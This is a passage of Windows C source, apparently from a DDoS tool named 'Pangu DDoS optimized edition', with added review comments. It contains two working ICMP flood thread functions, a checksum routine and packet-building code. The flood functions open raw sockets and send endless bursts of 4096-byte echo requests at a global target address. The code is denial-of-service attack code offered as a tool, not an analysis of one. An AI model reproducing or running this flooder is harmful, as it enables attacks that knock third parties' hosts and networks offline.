 * Takes no arguments. Returns on any setup failure without closing the
 * socket; the packet buffer is never freed; WSACleanup is never called.
 * NOTE(review): a raw ICMP socket on Windows normally requires
 * administrator rights -- confirm for the OS version in question.
 */
void icmp_flood() // ICMP flood thread body
{  
Sleep(2000);   // delay before the first packet
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);   // request Winsock 2.2; return value unchecked
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char              *icmp_data;
int   datasize = 32;   // dead: MAX_PACKET is what is actually sent
int timeout = 2000;    // send timeout, ms

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);   // raw ICMP socket
if (m_hSocket == INVALID_SOCKET)
   return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)   // send timeout only; socket leaks on this path
   return;

memset(&m_addrDest, 0, sizeof(m_addrDest));
m_addrDest.sin_family = AF_INET;   // IPv4
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)   // inet_addr returns INADDR_NONE for a non-numeric address
{  
   struct hostent *hp = NULL;   // fall back to a blocking DNS lookup
   if ((hp = gethostbyname(tgtIP)) != NULL)
   {
   memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);   // first returned address; h_length is its byte length
   m_addrDest.sin_family = hp->h_addrtype;   // address family reported by the resolver
   }
   else
    return;   // unresolvable: give up (socket leaks)
}            

datasize += sizeof(ICMP_HEADER);   // dead store
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);   // packet buffer; NULL not checked
memset(icmp_data,0,MAX_PACKET);   // redundant with HEAP_ZERO_MEMORY
fill_icmp_data(icmp_data,MAX_PACKET); // header + icmpBuffer payload
int seq_no=0;
int sleep_time = SleepTime/10; // derived from the global SleepTime but never used
while(1)
{
   if (StopFlag == 1) // StopFlag == 1 means "not attacking"
   {
    ExitThread(0);
    return;   // unreachable after ExitThread
   }
   ((ICMP_HEADER*)icmp_data)->i_cksum = 0;   // must be 0 while the checksum is computed
   ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;   // one sequence value per burst; no wrap handling
   ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();   // ms since boot
   ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);   // over all MAX_PACKET bytes
   for (int i=0;i<100;i++)   // 100 identical packets per burst
    sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));   // return value ignored
   Sleep(5);   // pause between bursts, ms
}
return;
}
/////////////////ICMP攻击结束

//================== ===============================

盘古DDOS优化版.h

/*
 * ICMP header layout (盘古 optimized build): standard 8-byte echo header
 * plus a 4-byte timestamp sent as the first payload bytes.
 */
typedef struct _icmphdr     // ICMP header definition
{
BYTE   i_type;      // 8-bit type (ICMP_ECHO)
BYTE   i_code;      // 8-bit code
USHORT i_cksum;      // 16-bit ones'-complement checksum
USHORT i_id;      // identifier (low 16 bits of the process id)
USHORT i_seq;      // sequence number
ULONG timestamp;     // GetTickCount value, carried in the payload
}ICMP_HEADER;

// ICMP type 8 = echo request; MAX_PACKET = bytes handed to sendto per packet
#define ICMP_ECHO               8
#define MAX_PACKET       4096

/*
 * RFC 1071 ones'-complement checksum of `size` bytes starting at `buffer`.
 * Whole 16-bit words are summed in host byte order; if a single byte is
 * left over it is added as an 8-bit value. The carries are folded back
 * into the low 16 bits and the complement is returned (0xFFFF for size 0).
 */
USHORT checksum(USHORT *buffer, int size)
{
unsigned long sum = 0;
int nwords;

/* whole words first */
for (nwords = 0; size - 2 * nwords > 1; nwords++)
   sum += buffer[nwords];

/* a leftover byte, if any */
int remaining = size - 2 * nwords;
if (remaining)
{
   const UCHAR *tail = (const UCHAR*)(buffer + nwords);
   sum += *tail;
}

sum = (sum >> 16) + (sum & 0xffff);   /* fold carries */
sum += (sum >> 16);
return (USHORT)(~sum);
}


///ICMP
// Payload string that fill_icmp_data copies after the ICMP header. Its byte
// length -- and therefore the exact on-wire payload -- depends on the source
// file's encoding (GBK vs UTF-8); not determinable from here.
char icmpBuffer[256]="啊啊啊啊啊"; // payload data

/*
 * Build an ICMP echo-request header at the start of icmp_data and copy the
 * global icmpBuffer string directly after it.
 *
 * icmp_data: caller-provided buffer of at least sizeof(ICMP_HEADER) +
 *            strlen(icmpBuffer) bytes -- not checked here.
 * datasize:  unused.
 * The checksum is left at 0 for the caller to recompute per packet.
 */
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char       *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;   // overlay the header on the buffer head
icmp_hdr->i_type = ICMP_ECHO;   // echo request
icmp_hdr->i_code = 0;
icmp_hdr->i_id   = (USHORT)GetCurrentProcessId();   // low 16 bits of the process id
icmp_hdr->i_cksum = 0;   // recomputed by the caller
icmp_hdr->i_seq = 0;

datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer)); // payload bytes, no terminator
}

/*
 * Thread body (盘古 optimized build): resolve the global tgtip and send
 * bursts of 1000 MAX_PACKET-byte ICMP echo requests with a 20 ms pause
 * between bursts, until the global Stop becomes 1.
 *
 * Takes no arguments. Returns on any setup failure without closing the
 * socket; the packet buffer is never freed; WSACleanup is never called.
 * NOTE(review): a raw ICMP socket on Windows normally requires
 * administrator rights -- confirm for the OS version in question.
 */
void icmpflood()
{  
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);   // request Winsock 2.2; return value unchecked
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char              *icmp_data;
int   datasize = 32;   // dead: MAX_PACKET is what is actually sent
int timeout = 2000;    // send timeout, ms

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); // raw ICMP socket
if (m_hSocket == INVALID_SOCKET)   // creation failed
   return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)     // send timeout only; socket leaks on this path
   return;

memset(&m_addrDest, 0, sizeof(m_addrDest)); // zero the address struct
m_addrDest.sin_family = AF_INET; // IPv4
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtip)) == INADDR_NONE) // target from the global tgtip; INADDR_NONE = not a dotted quad
{  
   struct hostent *hp = NULL;   // fall back to a blocking DNS lookup
   if ((hp = gethostbyname(tgtip)) != NULL)
   {
   memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);   // first returned address only
   m_addrDest.sin_family = hp->h_addrtype;
   }
   else
    return;   // unresolvable: give up (socket leaks)
}            

datasize += sizeof(ICMP_HEADER);   // dead store
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);   // packet buffer; NULL not checked
memset(icmp_data,0,MAX_PACKET); // redundant with HEAP_ZERO_MEMORY
fill_icmp_data(icmp_data,MAX_PACKET); // header + icmpBuffer payload
int seq_no=0;
while(1)
{
   if (Stop == 1)   // global stop flag
   {
    ExitThread(0);
    return;   // unreachable after ExitThread
   }
   ((ICMP_HEADER*)icmp_data)->i_cksum = 0; // must be 0 while the checksum is computed
   ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;// one sequence value per burst; no wrap handling
   ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount(); // ms since boot
   ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);// over all MAX_PACKET bytes
   for (int i=0;i<1000;i++)   // 1000 identical packets per burst
    sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));     // return value ignored
   Sleep(20);   // pause between bursts, ms
}
return;
}

